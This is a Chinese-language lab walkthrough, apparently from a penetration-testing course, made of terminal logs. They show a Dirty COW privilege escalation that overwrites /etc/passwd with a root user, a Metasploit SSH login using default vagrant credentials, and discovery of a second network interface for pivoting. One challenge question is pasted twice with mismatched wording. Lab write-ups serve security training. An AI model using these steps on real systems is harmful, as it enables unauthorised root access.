The authenticity of host '172.16.65.210 (172.16.65.210)' can't be established.
RSA key fingerprint is SHA256:gnWJCcZ+plw28GbzYOxL6XuI/fgL9w7vLOisRb/1xfY.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '172.16.65.210' (RSA) to the list of known hosts.
kevin@172.16.65.210's password:
Last login: Fri Dec 24 09:05:20 2021
kevin@owaspbwa:~$ ip addr
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue state UNKNOWN
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN qlen 1000
link/ether 00:15:5d:92:88:71 brd ff:ff:ff:ff:ff:ff
inet 172.16.65.210/16 brd 172.16.255.255 scope global eth0
inet6 fe80::215:5dff:fe92:8871/64 scope link
valid_lft forever preferred_lft forever
都get shell了,當然可以拿到userflag:
kevin@owaspbwa:~$ cd /
kevin@owaspbwa:/$ find -name userflag.txt
^C
kevin@owaspbwa:/$ find / -name userflag.txt -print 2>/dev/null
/home/kevin/userflag.txt
kevin@owaspbwa:/$ md5sum /home/kevin/userflag.txt
9b34b4fd941661615d819a6c03e86047 /home/kevin/userflag.txt
kevin@owaspbwa:/$ cat /home/kevin/userflag.txt
BWAMachineUser-6534
11 (Challenge 50) What is the last 6 hex digits of the md5 hash content of rootflag.txt on 192.168.65.210? Ans: E86047
接下來就是提權,這台可以用uname -a指令去看,可以知道大概有dirty cow漏洞,exploit-db的頁面如下:
反正POC code寫什麼也不重要,重要的是能不能在靶機上編譯:
kevin@owaspbwa:/tmp$ gcc
gcc: no input files
kevin@owaspbwa:/tmp$ vim dirty.c
kevin@owaspbwa:/tmp$ gcc -pthread dirty.c -o dirty -lcrypt
kevin@owaspbwa:/tmp$ ls -al
total 76
drwxrwxrwt 9 root root 4096 2021-12-24 12:12 .
drwxr-xr-x 23 root root 4096 2021-12-24 08:38 ..
-rw-r--r-- 1 kevin kevin 9156 2021-12-24 12:08 40847.cpp
-rwxr-xr-x 1 kevin kevin 12520 2021-12-24 12:12 dirty
-rw-r--r-- 1 kevin kevin 3713 2021-12-24 12:11 dirty.c
drwxr-xr-x 2 root root 4096 2021-12-24 08:38 hsperfdata_root
drwxrwxrwt 2 root root 4096 2021-12-24 08:38 .ICE-unix
-rw------- 1 www-data www-data 4 2021-12-24 08:38 mod_mono_dashboard_default_2
-rw------- 1 www-data www-data 4 2021-12-24 08:38 mod_mono_dashboard_XXGLOBAL_1
srwx------ 1 www-data www-data 0 2021-12-24 08:38 .mod_mono_server2
-rw------- 1 www-data www-data 0 2021-12-24 08:38 .mod_mono_server2_1920119561
drwxr-xr-x 3 root root 4096 2021-12-24 08:38 passenger.1.0.1391
drwxr-xr-x 2 root root 4096 2021-12-24 08:38 tomcat6-tmp
drwx------ 2 www-data www-data 4096 2021-12-24 08:38 .wapi
drwxr-xr-x 2 root root 4096 2021-12-24 08:38 .winbindd
drwxrwxrwt 2 root root 4096 2021-12-24 08:38 .X11-unix
kevin@owaspbwa:/tmp$ ./dirty 1234
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: 1234
Complete line:
firefart:fionu3giiS71.:0:0:pwned:/root:/bin/bash
mmap: b7724000
madvise 0
ptrace 0
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password '1234'.
DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password '1234'.
DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
kevin@owaspbwa:/tmp$ su firefart
Password:
Added user firefart.
firefart@owaspbwa:/tmp# cd /
firefart@owaspbwa:/# find -name rootflag.txt -print 2>/dev/null
^C
firefart@owaspbwa:/# cd
firefart@owaspbwa:~# ls
rootflag.txt
firefart@owaspbwa:~# cat rootflag.txt
WebRoot-1976
firefart@owaspbwa:~# md5sum rootflag.txt
4690c3e3529cbc642e9caf33785d4a27 rootflag.txt
成功提權後拿到flag。
11 (Challenge 50) What is the last 6 hex digits of the md5 hash content of rootflag.txt on 192.168.65.210? Ans: 5D4A27
Pivoting
再次ssh登入200,這一次使用metaspolit的工具來ssh登入:
┌──(root㉿kali)-[/home/kali/LPT_day2]
└─# msfconsole
.:okOOOkdc' 'cdkOOOko:.
.xOOOOOOOOOOOOc cOOOOOOOOOOOOx.
:OOOOOOOOOOOOOOOk, ,kOOOOOOOOOOOOOOO:
'OOOOOOOOOkkkkOOOOO: :OOOOOOOOOOOOOOOOOO'
oOOOOOOOO.MMMM.oOOOOoOOOOl.MMMM,OOOOOOOOo
dOOOOOOOO.MMMMMM.cOOOOOc.MMMMMM,OOOOOOOOx
lOOOOOOOO.MMMMMMMMM;d;MMMMMMMMM,OOOOOOOOl
.OOOOOOOO.MMM.;MMMMMMMMMMM;MMMM,OOOOOOOO.
cOOOOOOO.MMM.OOc.MMMMM'oOO.MMM,OOOOOOOc
oOOOOOO.MMM.OOOO.MMM:OOOO.MMM,OOOOOOo
lOOOOO.MMM.OOOO.MMM:OOOO.MMM,OOOOOl
;OOOO'MMM.OOOO.MMM:OOOO.MMM;OOOO;
.dOOo'WM.OOOOocccxOOOO.MX'xOOd.
,kOl'M.OOOOOOOOOOOOO.M'dOk,
:kk;.OOOOOOOOOOOOO.;Ok:
;kOOOOOOOOOOOOOOOk:
,xOOOOOOOOOOOx,
.lOOOOOOOl.
,dOd,
.
=[ metasploit v6.3.2-dev ]
+ -- --=[ 2290 exploits - 1201 auxiliary - 409 post ]
+ -- --=[ 968 payloads - 45 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit tip: Use the edit command to open the
currently active module in your editor
Metasploit Documentation: https://docs.metasploit.com/
msf6 > search ssh_login
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/ssh/ssh_login normal No SSH Login Check Scanner
1 auxiliary/scanner/ssh/ssh_login_pubkey normal No SSH Public Key Login Scanner
Interact with a module by name or index. For example info 1, use 1 or use auxiliary/scanner/ssh/ssh_login_pubkey
msf6 > use 0
msf6 auxiliary(scanner/ssh/ssh_login) > show options
Module options (auxiliary/scanner/ssh/ssh_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the cu
rrent database
DB_ALL_PASS false no Add all passwords in the current database to t
he list
DB_ALL_USERS false no Add all users in the current database to the l
ist
DB_SKIP_EXISTING none no Skip existing credentials stored in the curren
t database (Accepted: none, user, user&realm)
PASSWORD no A specific password to authenticate with
PASS_FILE no File containing passwords, one per line
RHOSTS yes The target host(s), see https://docs.metasploi
t.com/docs/using-metasploit/basics/using-metas
ploit.html
RPORT 22 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a ho
st
THREADS 1 yes The number of concurrent threads (max one per
host)
USERNAME no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated
by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE false yes Whether to print output for all attempts
View the full module info with the info, or info -d command.
msf6 auxiliary(scanner/ssh/ssh_login) > set rhosts 172.16.65.200
rhosts => 172.16.65.200
msf6 auxiliary(scanner/ssh/ssh_login) > set username vagrant
username => vagrant
msf6 auxiliary(scanner/ssh/ssh_login) > set password vagrant
password => vagrant
msf6 auxiliary(scanner/ssh/ssh_login) > run
[*] 172.16.65.200:22 - Starting bruteforce
[+] 172.16.65.200:22 - Success: 'vagrant:vagrant' 'uid=1000(vagrant) gid=1000(vagrant) groups=1000(vagrant),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),113(bluetooth),114(lpadmin),119(scanner) Linux debian-9 4.9.0-6-amd64 #1 SMP Debian 4.9.82-1+deb9u3 (2018-03-02) x86_64 GNU/Linux '
[*] SSH session 1 opened (192.168.200.4:40625 -> 172.16.65.200:22) at 2023-03-27 05:56:45 -0400
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/ssh/ssh_login) > set user_file ""
user_file =>
msf6 auxiliary(scanner/ssh/ssh_login) > set pass_file ""
pass_file =>
msf6 auxiliary(scanner/ssh/ssh_login) > sessions -l
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell linux SSH root @ 192.168.200.4:40625 -> 172.16.65.200:22 (172.16.65.200)
另外也用普通的ssh登入,利用ip addr指令查詢後,發現有雙網卡:
┌──(root㉿kali)-[~]
└─# ssh vagrant@172.16.65.200
vagrant@172.16.65.200's password:
Linux debian-9 4.9.0-6-amd64 #1 SMP Debian 4.9.82-1+deb9u3 (2018-03-02) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Dec 23 18:29:18 2021 from 172.16.0.1
vagrant@debian-9:~$ ip addr
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: enp0s10f0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN group default qlen 1000
link/ether 00:15:5d:92:88:6f brd ff:ff:ff:ff:ff:ff
inet 172.16.65.200/16 brd 172.16.255.255 scope global enp0s10f0
valid_lft forever preferred_lft forever
inet6 fe80::215:5dff:fe92:886f/64 scope link
valid_lft forever preferred_lft forever
3: enp0s10f1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:15:5d:92:88:78 brd ff:ff:ff:ff:ff:ff
inet 192.168.5.200/24 brd 192.168.5.255 scope global enp0s10f1
valid_lft forever preferred_lft forever
inet6 fe80::7130:6e6c:8771:2bca/64 scope link
valid_lft forever preferred_lft forever
Reference
IT小僧 - 常用網管指令(三) - nbtstat
Knowing the Angles of NetBIOS Suffixes | ITPro Today: IT News, How-Tos, Trends, Case Studies, Career Tips, More
解析 NetBIOS 名稱 | Davidou的 Blog
![[ 筆記 ] 產品需求文件(參考資料) & Final Project 構思紀錄](https://mtr04-note.coderbridge.io/2020/10/19/prd/?utm_source=coderbridge-io&utm_medium=blog_related_post_img&utm_campaign=little C Blog_[ 筆記 ] 產品需求文件(參考資料) & Final Project 構思紀錄_@krebikshaw_https://static.coderbridge.com/img/krebikshaw/b09e5e1a2aa84d31b623fdf78209f487.jpg)
![[筆記]認識 this 和 call、apply、bind](https://xiaoming.coderbridge.io/2020/10/27/認識-this/?utm_source=coderbridge-io&utm_medium=blog_related_post_img&utm_campaign=little C Blog_[筆記]認識 this 和 call、apply、bind_@ianchen6501_https://static.coderbridge.com/images/covers/default-post-cover-2.jpg)
